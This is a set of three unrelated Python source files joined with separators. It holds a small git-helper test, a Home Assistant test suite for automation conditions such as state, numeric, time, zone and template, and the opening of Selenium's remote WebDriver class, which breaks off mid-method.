git.get_tag()
check_calls(mock_call, ["git describe --tags --exact-match"])
def test_get_branch(self, mock_call):
"""Verify the commands to get the working tree's branch."""
git.get_branch()
check_calls(mock_call, ["git rev-parse --abbrev-ref HEAD"])
|
|
"""Test the condition helper."""
from logging import ERROR
import pytest
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import condition
from homeassistant.helpers.template import Template
from homeassistant.setup import async_setup_component
from homeassistant.util import dt
from tests.async_mock import patch
async def test_invalid_condition(hass):
"""Test if invalid condition raises."""
with pytest.raises(HomeAssistantError):
await condition.async_from_config(
hass,
{
"condition": "invalid",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
],
},
)
async def test_and_condition(hass):
"""Test the 'and' condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 110,
},
],
},
)
hass.states.async_set("sensor.temperature", 120)
assert not test(hass)
hass.states.async_set("sensor.temperature", 105)
assert not test(hass)
hass.states.async_set("sensor.temperature", 100)
assert test(hass)
async def test_and_condition_with_template(hass):
"""Test the 'and' condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "template",
"value_template": '{{ states.sensor.temperature.state == "100" }}',
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 110,
},
],
},
)
hass.states.async_set("sensor.temperature", 120)
assert not test(hass)
hass.states.async_set("sensor.temperature", 105)
assert not test(hass)
hass.states.async_set("sensor.temperature", 100)
assert test(hass)
async def test_or_condition(hass):
"""Test the 'or' condition."""
test = await condition.async_from_config(
hass,
{
"condition": "or",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 110,
},
],
},
)
hass.states.async_set("sensor.temperature", 120)
assert not test(hass)
hass.states.async_set("sensor.temperature", 105)
assert test(hass)
hass.states.async_set("sensor.temperature", 100)
assert test(hass)
async def test_or_condition_with_template(hass):
"""Test the 'or' condition."""
test = await condition.async_from_config(
hass,
{
"condition": "or",
"conditions": [
{
"condition": "template",
"value_template": '{{ states.sensor.temperature.state == "100" }}',
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 110,
},
],
},
)
hass.states.async_set("sensor.temperature", 120)
assert not test(hass)
hass.states.async_set("sensor.temperature", 105)
assert test(hass)
hass.states.async_set("sensor.temperature", 100)
assert test(hass)
async def test_not_condition(hass):
"""Test the 'not' condition."""
test = await condition.async_from_config(
hass,
{
"condition": "not",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 50,
},
],
},
)
hass.states.async_set("sensor.temperature", 101)
assert test(hass)
hass.states.async_set("sensor.temperature", 50)
assert test(hass)
hass.states.async_set("sensor.temperature", 49)
assert not test(hass)
hass.states.async_set("sensor.temperature", 100)
assert not test(hass)
async def test_not_condition_with_template(hass):
"""Test the 'or' condition."""
test = await condition.async_from_config(
hass,
{
"condition": "not",
"conditions": [
{
"condition": "template",
"value_template": '{{ states.sensor.temperature.state == "100" }}',
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 50,
},
],
},
)
hass.states.async_set("sensor.temperature", 101)
assert test(hass)
hass.states.async_set("sensor.temperature", 50)
assert test(hass)
hass.states.async_set("sensor.temperature", 49)
assert not test(hass)
hass.states.async_set("sensor.temperature", 100)
assert not test(hass)
async def test_time_window(hass):
"""Test time condition windows."""
sixam = dt.parse_time("06:00:00")
sixpm = dt.parse_time("18:00:00")
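# When "after" is later than "before" the window is treated as wrapping past
# midnight (18:00 -> 06:00), which the paired assertions below exercise.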
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt.now().replace(hour=3),
):
assert not condition.time(hass, after=sixam, before=sixpm)
assert condition.time(hass, after=sixpm, before=sixam)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt.now().replace(hour=9),
):
assert condition.time(hass, after=sixam, before=sixpm)
assert not condition.time(hass, after=sixpm, before=sixam)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt.now().replace(hour=15),
):
assert condition.time(hass, after=sixam, before=sixpm)
assert not condition.time(hass, after=sixpm, before=sixam)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt.now().replace(hour=21),
):
assert not condition.time(hass, after=sixam, before=sixpm)
assert condition.time(hass, after=sixpm, before=sixam)
async def test_time_using_input_datetime(hass):
"""Test time conditions using input_datetime entities."""
await async_setup_component(
hass,
"input_datetime",
{
"input_datetime": {
"am": {"has_date": True, "has_time": True},
"pm": {"has_date": True, "has_time": True},
}
},
)
await hass.services.async_call(
"input_datetime",
"set_datetime",
{
"entity_id": "input_datetime.am",
"datetime": str(
dt.now()
.replace(hour=6, minute=0, second=0, microsecond=0)
.replace(tzinfo=None)
),
},
blocking=True,
)
await hass.services.async_call(
"input_datetime",
"set_datetime",
{
"entity_id": "input_datetime.pm",
"datetime": str(
dt.now()
.replace(hour=18, minute=0, second=0, microsecond=0)
.replace(tzinfo=None)
),
},
blocking=True,
)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt.now().replace(hour=3),
):
assert not condition.time(
hass, after="input_datetime.am", before="input_datetime.pm"
)
assert condition.time(
hass, after="input_datetime.pm", before="input_datetime.am"
)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt.now().replace(hour=9),
):
assert condition.time(
hass, after="input_datetime.am", before="input_datetime.pm"
)
assert not condition.time(
hass, after="input_datetime.pm", before="input_datetime.am"
)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt.now().replace(hour=15),
):
assert condition.time(
hass, after="input_datetime.am", before="input_datetime.pm"
)
assert not condition.time(
hass, after="input_datetime.pm", before="input_datetime.am"
)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt.now().replace(hour=21),
):
assert not condition.time(
hass, after="input_datetime.am", before="input_datetime.pm"
)
assert condition.time(
hass, after="input_datetime.pm", before="input_datetime.am"
)
assert not condition.time(hass, after="input_datetime.not_existing")
assert not condition.time(hass, before="input_datetime.not_existing")
async def test_if_numeric_state_not_raise_on_unavailable(hass):
"""Test numeric_state doesn't raise on unavailable/unknown state."""
test = await condition.async_from_config(
hass,
{"condition": "numeric_state", "entity_id": "sensor.temperature", "below": 42},
)
with patch("homeassistant.helpers.condition._LOGGER.warning") as logwarn:
hass.states.async_set("sensor.temperature", "unavailable")
assert not test(hass)
assert len(logwarn.mock_calls) == 0
hass.states.async_set("sensor.temperature", "unknown")
assert not test(hass)
assert len(logwarn.mock_calls) == 0
async def test_state_multiple_entities(hass):
"""Test with multiple entities in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": ["sensor.temperature_1", "sensor.temperature_2"],
"state": "100",
},
],
},
)
hass.states.async_set("sensor.temperature_1", 100)
hass.states.async_set("sensor.temperature_2", 100)
assert test(hass)
hass.states.async_set("sensor.temperature_1", 101)
hass.states.async_set("sensor.temperature_2", 100)
assert not test(hass)
hass.states.async_set("sensor.temperature_1", 100)
hass.states.async_set("sensor.temperature_2", 101)
assert not test(hass)
async def test_multiple_states(hass):
"""Test with multiple states in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": ["100", "200"],
},
],
},
)
hass.states.async_set("sensor.temperature", 100)
assert test(hass)
hass.states.async_set("sensor.temperature", 200)
assert test(hass)
hass.states.async_set("sensor.temperature", 42)
assert not test(hass)
async def test_state_attribute(hass):
"""Test with state attribute in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"attribute": "attribute1",
"state": 200,
},
],
},
)
hass.states.async_set("sensor.temperature", 100, {"unkown_attr": 200})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": 200})
assert test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": "200"})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": 201})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": None})
assert not test(hass)
async def test_state_attribute_boolean(hass):
"""Test with boolean state attribute in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "state",
"entity_id": "sensor.temperature",
"attribute": "happening",
"state": False,
},
)
hass.states.async_set("sensor.temperature", 100, {"happening": 200})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"happening": True})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"no_happening": 201})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"happening": False})
assert test(hass)
async def test_state_using_input_entities(hass):
"""Test state conditions using input_* entities."""
await async_setup_component(
hass,
"input_text",
{
"input_text": {
"hello": {"initial": "goodbye"},
}
},
)
await async_setup_component(
hass,
"input_select",
{
"input_select": {
"hello": {"options": ["cya", "goodbye", "welcome"], "initial": "cya"},
}
},
)
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.salut",
"state": [
"input_text.hello",
"input_select.hello",
"input_number.not_exist",
"salut",
],
},
],
},
)
hass.states.async_set("sensor.salut", "goodbye")
assert test(hass)
hass.states.async_set("sensor.salut", "salut")
assert test(hass)
hass.states.async_set("sensor.salut", "hello")
assert not test(hass)
await hass.services.async_call(
"input_text",
"set_value",
{
"entity_id": "input_text.hello",
"value": "hi",
},
blocking=True,
)
assert not test(hass)
hass.states.async_set("sensor.salut", "hi")
assert test(hass)
hass.states.async_set("sensor.salut", "cya")
assert test(hass)
await hass.services.async_call(
"input_select",
"select_option",
{
"entity_id": "input_select.hello",
"option": "welcome",
},
blocking=True,
)
assert not test(hass)
hass.states.async_set("sensor.salut", "welcome")
assert test(hass)
async def test_numeric_state_multiple_entities(hass):
"""Test with multiple entities in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "numeric_state",
"entity_id": ["sensor.temperature_1", "sensor.temperature_2"],
"below": 50,
},
],
},
)
hass.states.async_set("sensor.temperature_1", 49)
hass.states.async_set("sensor.temperature_2", 49)
assert test(hass)
hass.states.async_set("sensor.temperature_1", 50)
hass.states.async_set("sensor.temperature_2", 49)
assert not test(hass)
hass.states.async_set("sensor.temperature_1", 49)
hass.states.async_set("sensor.temperature_2", 50)
assert not test(hass)
async def test_numeric_state_attribute(hass):
"""Test with numeric state attribute in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"attribute": "attribute1",
"below": 50,
},
],
},
)
hass.states.async_set("sensor.temperature", 100, {"unkown_attr": 10})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": 49})
assert test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": "49"})
assert test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": 51})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": None})
assert not test(hass)
async def test_numeric_state_using_input_number(hass):
"""Test numeric_state conditions using input_number entities."""
await async_setup_component(
hass,
"input_number",
{
"input_number": {
"low": {"min": 0, "max": 255, "initial": 10},
"high": {"min": 0, "max": 255, "initial": 100},
}
},
)
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": "input_number.high",
"above": "input_number.low",
},
],
},
)
hass.states.async_set("sensor.temperature", 42)
assert test(hass)
hass.states.async_set("sensor.temperature", 10)
assert not test(hass)
hass.states.async_set("sensor.temperature", 100)
assert not test(hass)
await hass.services.async_call(
"input_number",
"set_value",
{
"entity_id": "input_number.high",
"value": 101,
},
blocking=True,
)
assert test(hass)
assert not condition.async_numeric_state(
hass, entity="sensor.temperature", below="input_number.not_exist"
)
assert not condition.async_numeric_state(
hass, entity="sensor.temperature", above="input_number.not_exist"
)
async def test_zone_multiple_entities(hass):
"""Test with multiple entities in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "zone",
"entity_id": ["device_tracker.person_1", "device_tracker.person_2"],
"zone": "zone.home",
},
],
},
)
hass.states.async_set(
"zone.home",
"zoning",
{"name": "home", "latitude": 2.1, "longitude": 1.1, "radius": 10},
)
hass.states.async_set(
"device_tracker.person_1",
"home",
{"friendly_name": "person_1", "latitude": 2.1, "longitude": 1.1},
)
hass.states.async_set(
"device_tracker.person_2",
"home",
{"friendly_name": "person_2", "latitude": 2.1, "longitude": 1.1},
)
assert test(hass)
hass.states.async_set(
"device_tracker.person_1",
"home",
{"friendly_name": "person_1", "latitude": 20.1, "longitude": 10.1},
)
hass.states.async_set(
"device_tracker.person_2",
"home",
{"friendly_name": "person_2", "latitude": 2.1, "longitude": 1.1},
)
assert not test(hass)
hass.states.async_set(
"device_tracker.person_1",
"home",
{"friendly_name": "person_1", "latitude": 2.1, "longitude": 1.1},
)
hass.states.async_set(
"device_tracker.person_2",
"home",
{"friendly_name": "person_2", "latitude": 20.1, "longitude": 10.1},
)
assert not test(hass)
async def test_multiple_zones(hass):
"""Test with multiple entities in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "zone",
"entity_id": "device_tracker.person",
"zone": ["zone.home", "zone.work"],
},
],
},
)
hass.states.async_set(
"zone.home",
"zoning",
{"name": "home", "latitude": 2.1, "longitude": 1.1, "radius": 10},
)
hass.states.async_set(
"zone.work",
"zoning",
{"name": "work", "latitude": 20.1, "longitude": 10.1, "radius": 10},
)
hass.states.async_set(
"device_tracker.person",
"home",
{"friendly_name": "person", "latitude": 2.1, "longitude": 1.1},
)
assert test(hass)
hass.states.async_set(
"device_tracker.person",
"home",
{"friendly_name": "person", "latitude": 20.1, "longitude": 10.1},
)
assert test(hass)
hass.states.async_set(
"device_tracker.person",
"home",
{"friendly_name": "person", "latitude": 50.1, "longitude": 20.1},
)
assert not test(hass)
async def test_extract_entities():
"""Test extracting entities."""
assert condition.async_extract_entities(
{
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature_2",
"below": 110,
},
{
"condition": "not",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature_3",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature_4",
"below": 110,
},
],
},
{
"condition": "or",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature_5",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature_6",
"below": 110,
},
],
},
{
"condition": "state",
"entity_id": ["sensor.temperature_7", "sensor.temperature_8"],
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": ["sensor.temperature_9", "sensor.temperature_10"],
"below": 110,
},
Template("{{ is_state('light.example', 'on') }}"),
],
}
) == {
"sensor.temperature",
"sensor.temperature_2",
"sensor.temperature_3",
"sensor.temperature_4",
"sensor.temperature_5",
"sensor.temperature_6",
"sensor.temperature_7",
"sensor.temperature_8",
"sensor.temperature_9",
"sensor.temperature_10",
}
async def test_extract_devices():
"""Test extracting devices."""
assert (
condition.async_extract_devices(
{
"condition": "and",
"conditions": [
{"condition": "device", "device_id": "abcd", "domain": "light"},
{"condition": "device", "device_id": "qwer", "domain": "switch"},
{
"condition": "state",
"entity_id": "sensor.not_a_device",
"state": "100",
},
{
"condition": "not",
"conditions": [
{
"condition": "device",
"device_id": "abcd_not",
"domain": "light",
},
{
"condition": "device",
"device_id": "qwer_not",
"domain": "switch",
},
],
},
{
"condition": "or",
"conditions": [
{
"condition": "device",
"device_id": "abcd_or",
"domain": "light",
},
{
"condition": "device",
"device_id": "qwer_or",
"domain": "switch",
},
],
},
Template("{{ is_state('light.example', 'on') }}"),
],
}
)
== {"abcd", "qwer", "abcd_not", "qwer_not", "abcd_or", "qwer_or"}
)
async def test_condition_template_error(hass, caplog):
"""Test invalid template."""
caplog.set_level(ERROR)
test = await condition.async_from_config(
hass, {"condition": "template", "value_template": "{{ undefined.state }}"}
)
assert not test(hass)
assert len(caplog.records) == 1
assert caplog.records[0].message.startswith(
"Error during template condition: UndefinedError:"
)
async def test_condition_template_invalid_results(hass):
"""Test template condition render false with invalid results."""
test = await condition.async_from_config(
hass, {"condition": "template", "value_template": "{{ 'string' }}"}
)
assert not test(hass)
test = await condition.async_from_config(
hass, {"condition": "template", "value_template": "{{ 10.1 }}"}
)
assert not test(hass)
test = await condition.async_from_config(
hass, {"condition": "template", "value_template": "{{ 42 }}"}
)
assert not test(hass)
test = await condition.async_from_config(
hass, {"condition": "template", "value_template": "{{ [1, 2, 3] }}"}
)
assert not test(hass)
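# All of the tests above follow the same pattern: build a condition config
# dict, compile it once with condition.async_from_config(hass, config), and
# call the returned checker as test(hass) after each state change. A minimal
# sketch of that pattern (the entity id and threshold are only examples):
#
#     config = {
#         "condition": "numeric_state",
#         "entity_id": "sensor.temperature",
#         "below": 50,
#     }
#     test = await condition.async_from_config(hass, config)
#     hass.states.async_set("sensor.temperature", 42)
#     assert test(hass)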
|
|
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""The WebDriver implementation."""
import base64
import warnings
from .command import Command
from .webelement import WebElement
from .remote_connection import RemoteConnection
from .errorhandler import ErrorHandler
from .switch_to import SwitchTo
from .mobile import Mobile
from .file_detector import FileDetector, LocalFileDetector
from selenium.common.exceptions import WebDriverException
from selenium.common.exceptions import InvalidSelectorException
from selenium.webdriver.common.by import By
from selenium.webdriver.common.html5.application_cache import ApplicationCache
try:
str = basestring
except NameError:
pass
class WebDriver(object):
"""
Controls a browser by sending commands to a remote server.
This server is expected to be running the WebDriver wire protocol
as defined at
https://github.com/SeleniumHQ/selenium/wiki/JsonWireProtocol
:Attributes:
- session_id - String ID of the browser session started and controlled by this WebDriver.
     - capabilities - Dictionary of effective capabilities of this browser session as returned
by the remote server. See https://github.com/SeleniumHQ/selenium/wiki/DesiredCapabilities
- command_executor - remote_connection.RemoteConnection object used to execute commands.
- error_handler - errorhandler.ErrorHandler object used to handle errors.
"""
def __init__(self, command_executor='http://127.0.0.1:4444/wd/hub',
desired_capabilities=None, browser_profile=None, proxy=None, keep_alive=False):
"""
Create a new driver that will issue commands using the wire protocol.
:Args:
- command_executor - Either a string representing URL of the remote server or a custom
remote_connection.RemoteConnection object. Defaults to 'http://127.0.0.1:4444/wd/hub'.
- desired_capabilities - A dictionary of capabilities to request when
starting the browser session. Required parameter.
- browser_profile - A selenium.webdriver.firefox.firefox_profile.FirefoxProfile object.
Only used if Firefox is requested. Optional.
- proxy - A selenium.webdriver.common.proxy.Proxy object. The browser session will
be started with given proxy settings, if possible. Optional.
- keep_alive - Whether to configure remote_connection.RemoteConnection to use
HTTP keep-alive. Defaults to False.
"""
if desired_capabilities is None:
raise WebDriverException("Desired Capabilities can't be None")
if not isinstance(desired_capabilities, dict):
raise WebDriverException("Desired Capabilities must be a dictionary")
if proxy is not None:
proxy.add_to_capabilities(desired_capabilities)
self.command_executor = command_executor
if type(self.command_executor) is bytes or isinstance(self.command_executor, str):
self.command_executor = RemoteConnection(command_executor, keep_alive=keep_alive)
self._is_remote = True
self.session_id = None
self.capabilities = {}
self.error_handler = ErrorHandler()
self.start_client()
self.start_session(desired_capabilities, browser_profile)
self._switch_to = SwitchTo(self)
self._mobile = Mobile(self)
self.file_detector = LocalFileDetector()
@property
def mobile(self):
return self._mobile
@property
def name(self):
"""Returns the name of the underlying browser for this instance.
:Usage:
- driver.name
"""
if 'browserName' in self.capabilities:
return self.capabilities['browserName']
else:
raise KeyError('browserName not specified in session capabilities')
def start_client(self):
"""
Called before starting a new session. This method may be overridden
to define custom startup behavior.
"""
pass
def stop_client(self):
"""
Called after executing a quit command. This method may be overridden
to define custom shutdown behavior.
"""
pass
def start_session(self, desired_capabilities, browser_profile=None):
"""
Creates a new session with the desired capabilities.
:Args:
- browser_name - The name of the browser to request.
- version - Which browser version to request.
- platform - Which platform to request the browser on.
- javascript_enabled - Whether the new session should support JavaScript.
- browser_profile - A selenium.webdriver.firefox.firefox_profile.FirefoxProfile object. Only used if Firefox is requested.
"""
if browser_profile:
desired_capabilities['firefox_profile'] = browser_profile.encoded
response = self.execute(Command.NEW_SESSION, {
'desiredCapabilities': desired_capabilities,
})
self.session_id = response['sessionId']
self.capabilities = response['value']
# Quick check to see if we have a W3C Compliant browser
self.w3c = "takesElementScreenshot" in self.capabilities
def _wrap_value(self, value):
if isinstance(value, dict):
converted = {}
for key, val in value.items():
converted[key] = self._wrap_value(val)
return converted
elif isinstance(value, WebElement):
return {'ELEMENT': value.id, 'element-6066-11e4-a52e-4f735466cecf': value.id}
elif isinstance(value, list):
return list(self._wrap_value(item) for item in value)
else:
return value
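    # Note: WebElement arguments are serialized under both the legacy JSON Wire
    # Protocol key ('ELEMENT') and the W3C WebDriver element identifier
    # ('element-6066-11e4-a52e-4f735466cecf') so either kind of remote end can
    # resolve them; _unwrap_value below accepts the same two keys.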
def create_web_element(self, element_id):
"""
Creates a web element with the specified element_id.
"""
return WebElement(self, element_id, w3c=self.w3c)
def _unwrap_value(self, value):
if isinstance(value, dict) and ('ELEMENT' in value or 'element-6066-11e4-a52e-4f735466cecf' in value):
wrapped_id = value.get('ELEMENT', None)
if wrapped_id:
return self.create_web_element(value['ELEMENT'])
else:
return self.create_web_element(value['element-6066-11e4-a52e-4f735466cecf'])
elif isinstance(value, list):
return list(self._unwrap_value(item) for item in value)
else:
return value
def execute(self, driver_command, params=None):
"""
Sends a command to be executed by a command.CommandExecutor.
:Args:
- driver_command: The name of the command to execute as a string.
- params: A dictionary of named parameters to send with the command.
:Returns:
The command's JSON response loaded into a dictionary object.
"""
if self.session_id is not None:
if not params:
params = {'sessionId': self.session_id}
elif 'sessionId' not in params:
params['sessionId'] = self.session_id
params = self._wrap_value(params)
response = self.command_executor.execute(driver_command, params)
if response:
self.error_handler.check_response(response)
response['value'] = self._unwrap_value(
response.get('value', None))
return response
# If the server doesn't send a response, assume the command was
# a success
return {'success': 0, 'value': None, 'sessionId': self.session_id}
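    # Illustrative flow (not an additional API): a call such as
    #     self.execute(Command.GET, {'url': 'http://example.com'})
    # injects the session id, wraps any WebElement parameters, sends the
    # command through command_executor, validates the result with
    # error_handler.check_response and returns the response dict with its
    # 'value' unwrapped.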
def get(self, url):
"""
Loads a web page in the current browser session.
"""
self.execute(Command.GET, {'url': url})
@property
def title(self):
"""Returns the title of the current page.
:Usage:
driver.title
"""
resp = self.execute(Command.GET_TITLE)
return resp['value'] if resp['value'] is not None else ""
def find_element_by_id(self, id_):
"""Finds an element by id.
:Args:
- id\_ - The id of the element to be found.
:Usage:
driver.find_element_by_id('foo')
"""
return self.find_element(by=By.ID, value=id_)
def find_elements_by_id(self, id_):
"""
Finds multiple elements by id.
:Args:
- id\_ - The id of the elements to be found.
:Usage:
            driver.find_elements_by_id('foo')
"""
return self.find_elements(by=By.ID, value=id_)
def find_element_by_xpath(self, xpath):
"""
Finds an element by xpath.
:Args:
- xpath - The xpath locator of the element to find.
:Usage:
driver.find_element_by_xpath('//div/td[1]')
"""
return self.find_element(by=By.XPATH, value=xpath)
def find_elements_by_xpath(self, xpath):
"""
Finds multiple elements by xpath.
:Args:
- xpath - The xpath locator of the elements to be found.
:Usage:
driver.find_elements_by_xpath("//div[contains(@class, 'foo')]")
"""
return self.find_elements(by=By.XPATH, value=xpath)
def find_element_by_link_text(self, link_text):
"""
Finds an element by link text.
:Args:
- link_text: The text of the element to be found.
:Usage:
driver.find_element_by_link_text('Sign In')
"""
return self.find_element(by=By.LINK_TEXT, value=link_text)
def find_elements_by_link_text(self, text):
"""
Finds elements by link text.
:Args:
         - text: The text of the elements to be found.
:Usage:
driver.find_elements_by_link_text('Sign In')
"""
return self.find_elements(by=By.LINK_TEXT, value=text)
def find_element_by_partial_link_text(self, link_text):
"""
Finds an element by a partial match of its link text.
:Args:
- link_text: The text of the element to partially match on.
:Usage:
driver.find_element_by_partial_link_text('Sign')
"""
return self.find_element(by=By.PARTIAL_LINK_TEXT, value=link_text)
def find_elements_by_partial_link_text(self, link_text):
"""
Finds elements by a partial match of their link text.
:Args:
         - link_text: The text of the elements to partially match on.
        :Usage:
            driver.find_elements_by_partial_link_text('Sign')
"""
return self.find_elements(by=By.PARTIAL_LINK_TEXT, value=link_text)
def find_element_by_name(self, name):
"""
Finds an element by name.
:Args:
- name: The name of the element to find.
:Usage:
driver.find_element_by_name('foo')
"""
return self.find_element(by=By.NAME, value=name)
def find_elements_by_name(self, name):
"""
Finds elements by name.
:Args:
- name: The name of the elements to find.
:Usage:
driver.find_elements_by_name('foo')
"""
return self.find_elements(by=By.NAME, value=name)
def find_element_by_tag_name(self, name):
"""
Finds an element by tag name.
:Args:
- name: The tag name of the element to find.
:Usage:
driver.find_element_by_tag_name('foo')
"""
return self.find_element(by=By.TAG_NAME, value=name)
def find_elements_by_tag_name(self, name):
"""
Finds elements by tag name.
:Args:
         - name: The tag name to use when finding elements.
:Usage:
driver.find_elements_by_tag_name('foo')
"""
return self.find_elements(by=By.TAG_NAME, value=name)
def find_element_by_class_name(self, name):
"""
Finds an element by class name.
:Args:
- name: The class name of the element to find.
:Usage:
driver.find_element_by_class_name('foo')
"""
return self.find_element(by=By.CLASS_NAME, value=name)
def find_elements_by_class_name(self, name):
"""
Finds elements by class name.
:Args:
- name: The class name of the elements to find.
:Usage:
driver.find_elements_by_class_name('foo')
"""
return self.find_elements(by=By.CLASS_NAME, value=name)
def find_element_by_css_selector(self, css_selector):
"""
Finds an element by css selector.
:Args:
- css_selector: The css selector to use when finding elements.
:Usage:
driver.find_element_by_css_selector('#foo')
"""
return self.find_element(by=By.CSS_SELECTOR, value=css_selector)
def find_elements_by_css_selector(self, css_selector):
"""
Finds elements by css selector.
:Args:
- css_selector: The css selector to use when finding elements.
:Usage:
driver.find_elements_by_css_selector('.foo')
"""
return self.find_elements(by=By.CSS_SELECTOR, value=css_selector)
def execute_script(self, script, *args):
"""
        Synchronously executes JavaScript in the current window/frame.
:Args:
- script: The JavaScript to execute.
- \*args: Any applicable arguments for your JavaScript.
:Usage:
driver.execute_script('document.title')
"""
converted_args = list(args)
return self.execute(Command.EXECUTE_SCRIPT,
{'script': script, 'args':converted_args})['value']
def execute_async_script(self, script, *args):
"""
        Asynchronously executes JavaScript in the current window/frame.
:Args:
- script: The JavaScript to execute.
- \*args: Any applicable arguments for your JavaScript.
:Usage:
driver.execute_async_script('document.title')
"""
converted_args = list(args)
return self.execute(Command.EXECUTE_ASYNC_SCRIPT,
{'script': script, 'args':converted_args})['value']
@property
def current_url(self):
"""
Gets the URL of the current page.
:Usage:
driver.current_url
"""
return self.execute(Command.GET_CURRENT_URL)['value']
@property
def page_source(self):
"""
Gets the source of the current page.
:Usage:
driver.page_source
"""
return self.execute(Command.GET_PAGE_SOURCE)['value']
def close(self):
"""
Closes the current window.
:Usage:
driver.close()
"""
self.execute(Command.CLOSE)
def quit(self):
"""
Quits the driver and closes every associated window.
:Usage:
driver.quit()
"""
try:
self.execute(Command.QUIT)
finally:
self.stop_client()
@property
def current_window_handle(self):
"""
Returns the handle of the current window.
:Usage:
driver.current_window_handle
"""
return self.execute(Command.GET_CURRENT_WINDOW_HANDLE)['value']
@property
def window_handles(self):
"""
Returns the handles of all windows within the current session.
:Usage:
driver.window_handles
"""
return self.execute(Command.GET_WINDOW_HANDLES)['value']
def maximize_window(self):
"""
Maximizes the current window that webdriver is using
"""
command = Command.MAXIMIZE_WINDOW
if self.w3c:
command = Command.W3C_MAXIMIZE_WINDOW
self.execute(command, {"windowHandle": "current"})
@property
def switch_to(self):
return self._switch_to
#Target Locators
def switch_to_active_element(self):
""" Deprecated use driver.switch_to.active_element
"""
warnings.warn("use driver.switch_to.active_element instead", DeprecationWarning)
return self._switch_to.active_element
def switch_to_window(self, window_name):
""" Deprecated use driver.switch_to.window
"""
warnings.warn("use driver.switch_to.window instead", DeprecationWarning)
self._switch_to.window(window_name)
def switch_to_frame(self, frame_reference):
""" Deprecated use driver.switch_to.frame
"""
warnings.warn("use driver.switch_to.frame instead", DeprecationWarning)
self._switch_to.frame(frame_reference)
def switch_to_default_content(self):
""" Deprecated use driver.switch_to.default_content
"""
warnings.warn("use driver.switch_to.default_content instead", DeprecationWarning)
self._switch_to.default_content()
def switch_to_alert(self):
""" Deprecated use driver.switch_to.alert
"""
warnings.warn("use driver.switch_to.alert instead", DeprecationWarning)
return self._switch_to.alert
#Navigation
def back(self):
"""
Goes one step backward in the browser history.
:Usage:
driver.back()
"""
self.execute(Command.GO_BACK)
def forward(self):
"""
Goes one step forward in the browser history.
:Usage:
driver.forward()
"""
self.execute(Command.GO_FORWARD)
def refresh(self):
"""
Refreshes the current page.
:Usage:
driver.refresh()
"""
self.execute(Command.REFRESH)
# Options
def get_cookies(self):
"""
Returns a set of dictionaries, corresponding to cookies visible in the current session.
:Usage:
driver.get_cookies()
"""
return self.execute(Command.GET_ALL_COOKIES)['value']
def get_cookie(self, name):
